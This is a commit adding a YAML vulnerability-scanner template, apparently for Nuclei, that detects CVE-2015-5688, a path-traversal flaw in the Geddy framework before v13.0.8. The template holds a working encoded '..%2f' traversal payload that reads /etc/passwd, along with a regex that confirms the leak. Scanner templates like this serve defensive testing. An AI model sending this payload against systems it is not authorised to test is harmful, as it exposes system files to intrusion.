Create CVE-2015-5688.yaml

patch-1
PikPikcU 2021-02-25 02:34:40 +00:00 committed by GitHub
parent 2fdfe781e6
commit c0922ec5d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: CVE-2015-5688
info:
name: Geddy before v13.0.8 LFI
author: pikpikcu
severity: high
issues: https://github.com/geddy/geddy/issues/697
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
tags: geddy,lfi
requests:
- method: GET
path:
- "{{BaseURL}}:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200